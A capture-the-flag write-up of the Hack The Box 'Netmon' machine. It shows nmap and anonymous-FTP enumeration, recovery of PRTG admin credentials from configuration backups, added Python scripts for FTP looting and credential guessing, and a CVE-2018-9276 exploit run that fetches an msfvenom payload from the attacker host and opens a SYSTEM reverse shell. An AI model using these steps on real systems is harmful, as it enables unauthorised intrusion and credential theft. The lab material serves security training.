Netmon-htb-writeup

0x00 Skills covered by this box

Skills for this chapter: anonymous FTP access, downloading PRTG Network Monitor backup files, spotting password patterns, CVE-2018-9276

Reference links: none

0x01 Getting user privileges

1. Target IP address: 10.10.10.152

2. Enumerate the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.152
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 23:58 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.29s latency).
Not shown: 65338 closed tcp ports (reset), 184 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 --min-rate=10000 -sC -sV 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 00:04 CST
Nmap scan report for 10.10.10.152
Host is up (0.50s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-05-20T08:00:46
|_ start_date: 2024-05-20T07:46:36
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -8h04m35s, deviation: 1s, median: -8h04m36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.80 seconds

3. Enumeration shows the first flag is readable straight over the anonymous FTP service, and that is the intended path.

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50148|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50151|)
150 Opening ASCII mode data connection.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50159|)
150 Opening ASCII mode data connection.
01-15-24 11:03AM <DIR> Desktop
02-03-19 08:05AM <DIR> Documents
07-16-16 09:18AM <DIR> Downloads
07-16-16 09:18AM <DIR> Music
07-16-16 09:18AM <DIR> Pictures
07-16-16 09:18AM <DIR> Videos
226 Transfer complete.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50160|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
05-20-24 03:47AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50161|)
150 Opening ASCII mode data connection.
100% |*******************************************************************************************************************************************| 34 0.05 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat user.txt
d4009d1ebd454aa898027a1ae7c10e4a

0x02 Getting SYSTEM privileges

4. Visit the web service on port 80

http://10.10.10.152/index.htm

5. The default credentials published online (prtgadmin / prtgadmin) don't work, so the password has been changed. Next, look for an RCE in this PRTG version. CVE-2018-9276 is a command injection in PRTG's notification feature that requires an authenticated admin session, so valid credentials are still needed; the PRTG knowledge base says where the configuration (and any backups) live on disk:

https://github.com/A1vinSmith/CVE-2018-9276

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

%programdata%\Paessler\PRTG Network Monitor

6. Initial enumeration under that directory turns up a configuration backup zip, which contains the encrypted password cells

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

230 User logged in.
Remote system type is Windows_NT.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||50252|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd programdata
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50262|)
125 Data connection already open; Transfer starting.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50272|)
150 Opening ASCII mode data connection.
05-20-24 05:10AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50273|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM <DIR> Configuration Auto-Backups
05-20-24 05:10AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
05-20-24 05:10AM <DIR> Logs (Web Server)
01-15-24 11:03AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
05-20-24 05:10AM 1647093 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> cd "Configuration Auto-Backups"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50285|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM 64004 PRTG Configuration (Update to 18.1.37.13946).zip
226 Transfer complete.
ftp> get "PRTG Configuration (Update to 18.1.37.13946).zip"
local: PRTG Configuration (Update to 18.1.37.13946).zip remote: PRTG Configuration (Update to 18.1.37.13946).zip
229 Entering Extended Passive Mode (|||50315|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************************| 64004 67.31 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 223 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
64004 bytes received in 00:00 (67.28 KiB/s)
ftp>

<login>
prtgadmin
</login>
<name>
PRTG System Administrator
</name>
<ownerid>
100
</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">
JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======
</cell>
<cell col="1" crypt="PRTG">
OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW
</cell>
</password>

7. I tried https://github.com/yobabyte/decryptocollection on these cells and it could not decrypt them. Note also the "WARNING! 223 bare linefeeds received in ASCII mode" on the transfer above: the zip was fetched in ASCII mode, which rewrites line endings, so the archive may well be corrupt; run `binary` in the ftp client before downloading archives or .dat files. On top of that the VPN was really bad, lagging and dropping constantly.
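The FTP enumeration of steps 3 and 6, as an added example that is not code from the original writeup: a Python script that walks the anonymous FTP share recursively, parses Microsoft ftpd's MS-DOS-style listing lines, and fetches candidate files in binary mode, which is the fix for the "bare linefeeds received in ASCII mode" warning on the zip transfer above. The start directories, the file filter and the e-mail address used as the anonymous password are my choices, not something the page specifies.

```python
"""Recursive anonymous-FTP enumeration against a Microsoft ftpd, with binary downloads."""
import re
import sys
from ftplib import FTP, error_perm

# Microsoft ftpd "LIST" lines look like:  02-03-19 12:18AM        1024 .rnd
# or, for directories:                    02-25-19 10:15PM  <DIR>     inetpub
MSDOS_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{1,2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+)$"
)


def parse_msdos_line(line):
    """Parse one MS-DOS style listing line into (name, is_dir, size); None if it is not one."""
    m = MSDOS_LINE.match(line.strip())
    if not m:
        return None
    is_dir = m.group("dir") is not None
    return m.group("name"), is_dir, 0 if is_dir else int(m.group("size"))


def walk(ftp, path, max_depth=4, _depth=0):
    """Yield (absolute_path, size) for every file below `path`, recursing into directories."""
    try:
        ftp.cwd(path)
    except error_perm:
        return  # not listable with the anonymous account (e.g. /Users/Administrator)
    lines = []
    ftp.retrlines("LIST", lines.append)
    for line in lines:
        entry = parse_msdos_line(line)
        if entry is None:
            continue
        name, is_dir, size = entry
        full = path.rstrip("/") + "/" + name
        if not is_dir:
            yield full, size
        elif _depth < max_depth:
            yield from walk(ftp, full, max_depth, _depth + 1)
            ftp.cwd(path)  # the recursion moved the server-side cwd; come back


def fetch(ftp, remote_path, local_path):
    """Download a file. retrbinary switches the session to TYPE I (binary), so
    line endings are preserved and .zip/.dat files arrive intact."""
    with open(local_path, "wb") as fh:
        ftp.retrbinary("RETR " + remote_path, fh.write)


def interesting(path):
    """Files worth pulling from a PRTG host: flags, config backups and the live configuration.
    The suffix list and directory filter are this example's choices."""
    low = path.lower()
    return low.endswith((".txt", ".zip", ".dat", ".old", ".bak")) and (
        "/paessler/" in low or "/users/" in low
    )


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.152"
    ftp = FTP(host, timeout=30)
    ftp.login("anonymous", "anonymous@example.com")  # Microsoft ftpd asks for an e-mail as password
    for start in ("/Users", "/ProgramData/Paessler"):
        for remote, size in list(walk(ftp, start)):  # list() first: downloads must not race the walk
            print(f"{size:>10}  {remote}")
            if interesting(remote):
                fetch(ftp, remote, remote.rsplit("/", 1)[-1])
    ftp.quit()
```

Run it as `python3 ftpwalk.py 10.10.10.152`; every file matching `interesting()` lands in the current directory with its original name, downloaded in binary mode.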

8. Switch to a different download route: a graphical file browser, following the path from the knowledge-base article above, to pull the configuration files themselves

┌──(kali㉿offsec)-[~/Desktop/config]
└─$ tree
.
├── PRTG Configuration.dat
├── PRTG Configuration.old
└── PRTG Configuration.old.bak

1 directory, 3 files

9. Analyze these configuration files

PRTG Configuration.dat

PRTG Configuration.old

PRTG Configuration.old.bak

<!-- User: prtgadmin -->
PrTg@dmin2018



<login>
prtgadmin
</login>
<name>
PRTG System Administrator
</name>
<ownerid>
100
</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">
PDWXMOPZT43U2GKGR3YCBILXDMLAUZVBN27KGBOPKXRQ====
</cell>
<cell col="1" crypt="PRTG">
M24VKFRECBEGN3ZQNGSET723GFIPVHYX
</cell>
</password>

10. A plaintext password turns up (in the .old.bak, the file dated 2018), but logging in with it fails

user: prtgadmin
pwd: PrTg@dmin2018

11. The password ends in a year, and the box was released in 2019, so try incrementing it

prtgadmin
PrTg@dmin2019

http://10.10.10.152/welcome.htm
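Steps 6 through 11, the configuration-file credential hunt and the year-increment guess, as one added Python script that is not part of the original writeup. It extracts the `<!-- User: ... -->` plaintext secret and the encrypted `crypt="PRTG"` cells from a PRTG configuration file, turns a password with a trailing year into a list of neighbouring years, and optionally tries each candidate against the PRTG login handler. The embedded sample config is constructed from the fragments shown above; its `<data>/<userdata>/<user>` nesting, the `<dbpassword>` element and the `/public/checklogin.htm` endpoint are assumptions, and the login probe is not exercised offline.

```python
"""Pull PRTG credentials out of a configuration backup and derive login candidates from them."""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample built from the fragments shown above. The <data>/<userdata>/<user>
# nesting and the <dbpassword> element are assumptions about PRTG's layout for this example.
SAMPLE_CONFIG = """<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <userdata>
    <user id="100">
      <login>prtgadmin</login>
      <name>PRTG System Administrator</name>
      <ownerid>100</ownerid>
      <password>
        <flags><encrypted/></flags>
        <cell col="0" crypt="PRTG">PDWXMOPZT43U2GKGR3YCBILXDMLAUZVBN27KGBOPKXRQ====</cell>
        <cell col="1" crypt="PRTG">M24VKFRECBEGN3ZQNGSET723GFIPVHYX</cell>
      </password>
    </user>
  </userdata>
</data>
"""

# The old config keeps a plaintext secret right after a "<!-- User: ... -->" comment.
USER_COMMENT = re.compile(r"<!--\s*User:\s*(?P<user>\S+)\s*-->\s*(?P<secret>[^\s<]+)")
YEAR_SUFFIX = re.compile(r"(?P<stem>.*?)(?P<year>(?:19|20)\d{2})")


def extract_credentials(xml_text):
    """Return {'plaintext': [(user, secret), ...], 'users': {login: [encrypted cells]}}."""
    found = {"plaintext": [], "users": {}}
    for m in USER_COMMENT.finditer(xml_text):  # regex on raw text: ET drops comments
        found["plaintext"].append((m.group("user"), m.group("secret")))
    root = ET.fromstring(xml_text)
    for node in root.iter():  # any element carrying both <login> and <password> is a user
        login, pw = node.find("login"), node.find("password")
        if login is not None and pw is not None:
            found["users"][login.text.strip()] = [c.text.strip() for c in pw.findall("cell")]
    return found


def year_candidates(password, years_back=1, years_ahead=6):
    """If a password ends in a four-digit year, return it with neighbouring years, oldest first."""
    m = YEAR_SUFFIX.fullmatch(password)
    if not m:
        return [password]
    stem, year = m.group("stem"), int(m.group("year"))
    return [f"{stem}{y}" for y in range(year - years_back, year + years_ahead + 1)]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 302 as an HTTPError instead of following it


def prtg_login(base_url, username, password, timeout=15):
    """Try one credential pair against PRTG's login handler (assumed path /public/checklogin.htm).
    A redirect to /welcome.htm, the page reached after the successful login above, counts as success."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/public/checklogin.htm", data=body)
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        location = opener.open(req, timeout=timeout).headers.get("Location", "")
    except urllib.error.HTTPError as err:
        location = err.headers.get("Location", "")
    return "welcome.htm" in location


if __name__ == "__main__":
    # usage: script.py ["PRTG Configuration.old.bak"] [http://10.10.10.152]
    config = SAMPLE_CONFIG
    if len(sys.argv) > 1:
        config = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    creds = extract_credentials(config)
    print("encrypted cells:", creds["users"])
    for user, secret in creds["plaintext"]:
        for candidate in year_candidates(secret):
            if len(sys.argv) > 2 and prtg_login(sys.argv[2], user, candidate):
                print(f"valid: {user}:{candidate}")
                break
            print(f"candidate: {user}:{candidate}")
```

With the real `PRTG Configuration.old.bak` and the target URL as arguments the script walks PrTg@dmin2017 through PrTg@dmin2024 and stops at the first accepted pair; without arguments it only prints the candidates derived from the embedded sample.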

12. Login succeeds, so run the public exploit directly rather than doing it by hand

https://github.com/A1vinSmith/CVE-2018-9276

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 exp.py -i 10.10.10.152 -p 80 --lhost 10.10.14.45 --lport 443 --user prtgadmin --password PrTg@dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.45 LPORT=443 OUTPUT=/tmp/tbfvtymv.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/kali/Desktop/exp.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
impacket.setName('Impacket')
/home/kali/Desktop/exp.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.45\MMIRDVSR]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.45:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.10.10.152,50344)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.152] 50345
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system

13. Not bad: the exploit lands straight as SYSTEM, because the PRTG core server service runs as NT AUTHORITY\SYSTEM, so just read the final flag

C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5

Directory of C:\Users\Administrator\Desktop

02/03/2019 12:35 AM <DIR> .
02/03/2019 12:35 AM <DIR> ..
05/20/2024 08:21 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,732,656,640 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
38a3446085fad5ca871f1781548a758b

C:\Users\Administrator\Desktop>

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/177


Netmon-htb-writeup
https://sh1yan.top/2024/05/21/Netmon-htb-writeup/
Author: shiyan
Published: 2024-05-21
License